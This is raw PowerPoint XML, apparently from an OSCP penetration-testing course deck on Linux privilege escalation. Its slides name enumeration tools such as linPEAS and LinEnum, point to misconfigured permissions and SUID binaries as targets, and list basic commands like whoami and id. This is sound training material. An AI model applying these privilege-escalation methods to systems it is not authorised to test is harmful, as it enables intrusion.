                          <a14:foregroundMark x1="60305" y1="20751" x2="60305" y2="20751"/>
                          <a14:foregroundMark x1="61691" y1="14349" x2="61691" y2="14349"/>
                          <a14:foregroundMark x1="63216" y1="13466" x2="63216" y2="13466"/>
                          <a14:foregroundMark x1="63447" y1="14128" x2="64972" y2="14128"/>
                          <a14:backgroundMark x1="17375" y1="46689" x2="17375" y2="46689"/>
                          <a14:backgroundMark x1="8549" y1="35872" x2="8549" y2="35872"/>
                          <a14:backgroundMark x1="37107" y1="43377" x2="37107" y2="43377"/>
                          <a14:backgroundMark x1="37477" y1="39735" x2="37477" y2="39735"/>
                          <a14:backgroundMark x1="37847" y1="37748" x2="37847" y2="37748"/>
                          <a14:backgroundMark x1="86553" y1="39514" x2="86553" y2="39514"/>
                        </a14:backgroundRemoval>
                      </a14:imgEffect>
                    </a14:imgLayer>
                  </a14:imgProps>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect r="26230"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7681802" y="1706772"/>
              <a:ext cx="3874024" cy="219862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588ACE0F-3BD6-4F72-80AD-60F607846E3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34" b="89956" l="5961" r="93715">
                          <a14:foregroundMark x1="6007" y1="32230" x2="6007" y2="32230"/>
                          <a14:foregroundMark x1="63909" y1="31236" x2="63909" y2="31236"/>
                          <a14:foregroundMark x1="67468" y1="53311" x2="67468" y2="53311"/>
                          <a14:foregroundMark x1="67930" y1="36424" x2="67930" y2="36424"/>
                          <a14:foregroundMark x1="78466" y1="48234" x2="78466" y2="48234"/>
                          <a14:foregroundMark x1="84011" y1="41943" x2="84011" y2="41943"/>
                          <a14:foregroundMark x1="93715" y1="35651" x2="93715" y2="35651"/>
                          <a14:foregroundMark x1="93484" y1="55740" x2="93484" y2="55740"/>
                          <a14:foregroundMark x1="62662" y1="68764" x2="62662" y2="68764"/>
                          <a14:foregroundMark x1="58457" y1="80905" x2="58457" y2="80905"/>
                          <a14:foregroundMark x1="60305" y1="20751" x2="60305" y2="20751"/>
                          <a14:foregroundMark x1="61691" y1="14349" x2="61691" y2="14349"/>
                          <a14:foregroundMark x1="63216" y1="13466" x2="63216" y2="13466"/>
                          <a14:foregroundMark x1="63447" y1="14128" x2="64972" y2="14128"/>
                          <a14:backgroundMark x1="17375" y1="46689" x2="17375" y2="46689"/>
                          <a14:backgroundMark x1="8549" y1="35872" x2="8549" y2="35872"/>
                          <a14:backgroundMark x1="37107" y1="43377" x2="37107" y2="43377"/>
                          <a14:backgroundMark x1="37477" y1="39735" x2="37477" y2="39735"/>
                          <a14:backgroundMark x1="37847" y1="37748" x2="37847" y2="37748"/>
                          <a14:backgroundMark x1="86553" y1="39514" x2="86553" y2="39514"/>
                        </a14:backgroundRemoval>
                      </a14:imgEffect>
                    </a14:imgLayer>
                  </a14:imgProps>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect l="73144" t="20714" b="37348"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="9117367" y="3001271"/>
              <a:ext cx="1751742" cy="1145220"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2748516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62BAD-B451-478A-BDCF-32BCA9825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0D21E32-D61B-4F33-B175-F935FD63613C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tool Options</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7661A968-4A24-4151-83DA-F7C5CB502481}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="1295400"/>
            <a:ext cx="6433502" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Know how to do manual enumeration, but for OSCP use tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lets you focus on spotting the opportunities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Options:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linPEAS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Brent’s favorite)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LinEnum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (similar, but less robust)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux Exploit Suggester (mostly kernel)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux Privilege Checker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Diagram&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D089E68D-D17B-4344-9A00-EC44EF23D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167" b="90000" l="1328" r="98125">
                        <a14:foregroundMark x1="19609" y1="23500" x2="19609" y2="23500"/>
                        <a14:foregroundMark x1="17891" y1="20000" x2="17891" y2="20000"/>
                        <a14:foregroundMark x1="14375" y1="28500" x2="18047" y2="14333"/>
                        <a14:foregroundMark x1="18047" y1="14333" x2="24453" y2="12833"/>
                        <a14:foregroundMark x1="24453" y1="12833" x2="30312" y2="16833"/>
                        <a14:foregroundMark x1="30312" y1="16833" x2="33438" y2="28000"/>
                        <a14:foregroundMark x1="33438" y1="28000" x2="26406" y2="30500"/>
                        <a14:foregroundMark x1="26406" y1="30500" x2="14688" y2="29167"/>
                        <a14:foregroundMark x1="23516" y1="18833" x2="24063" y2="18333"/>
                        <a14:foregroundMark x1="71016" y1="11333" x2="56875" y2="17833"/>
                        <a14:foregroundMark x1="56875" y1="17833" x2="50859" y2="11333"/>
                        <a14:foregroundMark x1="50859" y1="11333" x2="40391" y2="9667"/>
                        <a14:foregroundMark x1="40391" y1="9667" x2="33516" y2="15500"/>
                        <a14:foregroundMark x1="33516" y1="15500" x2="27891" y2="7333"/>
                        <a14:foregroundMark x1="27891" y1="7333" x2="20469" y2="3333"/>
                        <a14:foregroundMark x1="20469" y1="3333" x2="11016" y2="24333"/>
                        <a14:foregroundMark x1="11016" y1="24333" x2="4375" y2="29833"/>
                        <a14:foregroundMark x1="4375" y1="29833" x2="7969" y2="45667"/>
                        <a14:foregroundMark x1="7969" y1="45667" x2="14141" y2="53167"/>
                        <a14:foregroundMark x1="14141" y1="53167" x2="12422" y2="44167"/>
                        <a14:foregroundMark x1="83281" y1="32333" x2="89375" y2="44167"/>
                        <a14:foregroundMark x1="89375" y1="44167" x2="95547" y2="50833"/>
                        <a14:foregroundMark x1="95547" y1="50833" x2="89219" y2="79833"/>
                        <a14:foregroundMark x1="89219" y1="79833" x2="90938" y2="93667"/>
                        <a14:foregroundMark x1="96787" y1="91524" x2="98672" y2="90833"/>
                        <a14:foregroundMark x1="90938" y1="93667" x2="94262" y2="92449"/>
                        <a14:foregroundMark x1="98283" y1="81476" x2="98125" y2="77667"/>
                        <a14:foregroundMark x1="98672" y1="90833" x2="98332" y2="82645"/>
                        <a14:foregroundMark x1="94162" y1="82818" x2="93125" y2="84167"/>
                        <a14:foregroundMark x1="98125" y1="77667" x2="97245" y2="78811"/>
                        <a14:foregroundMark x1="5234" y1="36667" x2="5234" y2="29667"/>
                        <a14:foregroundMark x1="28594" y1="26333" x2="27109" y2="21167"/>
                        <a14:foregroundMark x1="19766" y1="26000" x2="20000" y2="19500"/>
                        <a14:foregroundMark x1="1406" y1="29167" x2="1406" y2="29167"/>
                        <a14:foregroundMark x1="68516" y1="9167" x2="68516" y2="9167"/>
                        <a14:backgroundMark x1="95938" y1="77500" x2="95781" y2="77500"/>
                        <a14:backgroundMark x1="96094" y1="81000" x2="95156" y2="81500"/>
                        <a14:backgroundMark x1="97578" y1="79667" x2="94531" y2="82167"/>
                        <a14:backgroundMark x1="94219" y1="82667" x2="94453" y2="82833"/>
                        <a14:backgroundMark x1="97422" y1="79167" x2="96875" y2="78833"/>
                        <a14:backgroundMark x1="96328" y1="90167" x2="93828" y2="91167"/>
                      </a14:backgroundRemoval>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7142480" y="2606807"/>
            <a:ext cx="4949409" cy="2320036"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12581863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F48204-D3F2-455A-A8F0-C60DDEE7C5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3100CCC-AE8F-4D32-998A-43F0AD6DD22E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linPEAS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>LinEnum</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A807B14-F5B5-4D01-B128-5BEFFE32FC95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080629" y="1350592"/>
            <a:ext cx="9557330" cy="1946708"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{819EF5A9-6E7D-483F-AA4C-D70AF3EA8ECA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2458772" y="2426764"/>
            <a:ext cx="9204908" cy="1887970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B4CE42F-9394-43AE-B8BD-098E96183DC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2976835" y="4846236"/>
            <a:ext cx="6258798" cy="1352739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57B35615-FB1E-4769-AB34-3FC9FC868420}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9235633" y="5773388"/>
            <a:ext cx="16049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rial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>LinEnum</a:t>
            </a:r>
            <a:endPar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8DD15480-F3B9-4004-8EB8-ADBA944B4455}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10637959" y="1910460"/>
            <a:ext cx="15007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rial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>linPEAS</a:t>
            </a:r>
            <a:endPar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517644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C71AE-FA18-41F7-86A0-1D7304E53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B3651CD-08F8-4EF4-9502-F4729B6C7386}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux Privilege Escalation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CF8F851-695B-41A4-87F6-2932CBE765D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414337" y="1295400"/>
            <a:ext cx="7468743" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often focused on misconfigured permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Writable files, SUID binaries/scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>General Workflow:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Diagram 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1489CA6B-54D7-4B0B-845A-0960C29D0B68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="434050" y="3310467"/>
          <a:ext cx="11344368"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877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14BB8A-0096-47DA-8677-EE75CC548A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D347FCA-44F4-4E78-83A1-A2DBA865CA41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Who Am I?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1931D03F-009E-43B7-860E-CA4EAB2DF224}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414339" y="1295400"/>
            <a:ext cx="5854381" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look for easy wins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do I already have elevated permissions?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Do I have permissions to special groups that can help me?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common Commands:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>whoami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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-l</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/group</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10C9B86C-9172-4E51-AA48-EEDA8D566AAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="1" t="7989" r="35743" b="19893"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6575917" y="975360"/>
            <a:ext cx="5464502" cy="3291840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9711A92B-8B52-46FE-8B10-18B7CC3A6CB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6096000" y="3225800"/>
            <a:ext cx="469683" cy="406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0E481FA-D0C7-4DE1-9409-B0A1171BF2F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="23820" r="43849" b="16064"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4307842" y="4500069"/>
            <a:ext cx="4815838" cy="1542938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{932122D1-0D9B-411C-92AC-BD5870CA69D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="39602" r="48331" b="39008"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7004074" y="5684350"/>
            <a:ext cx="3603065" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Arrow Connector 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6538EF9D-37E8-4E97-A338-A0C5BC8162AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3742850" y="5933440"/>
            <a:ext cx="9345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(4/6)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4338" y="1292088"/>
            <a:ext cx="11363325" cy="616226"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: SMB Scripts from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AutoRecon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D598E211-372D-43D7-B546-C5C675259187}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="435560" y="1840048"/>
            <a:ext cx="11031489" cy="962159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5A42EB6-20EE-4740-B84E-4E5BBDFF4018}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="653553" y="2080607"/>
            <a:ext cx="10813496" cy="2092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572430E-9CA0-4183-B76E-395BDA03C9AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1259840" y="2308214"/>
            <a:ext cx="2556786" cy="226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4" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B84C5D6A-7F16-4F4C-830D-B88066885698}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3337043" y="2948039"/>
            <a:ext cx="5228522" cy="3306928"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
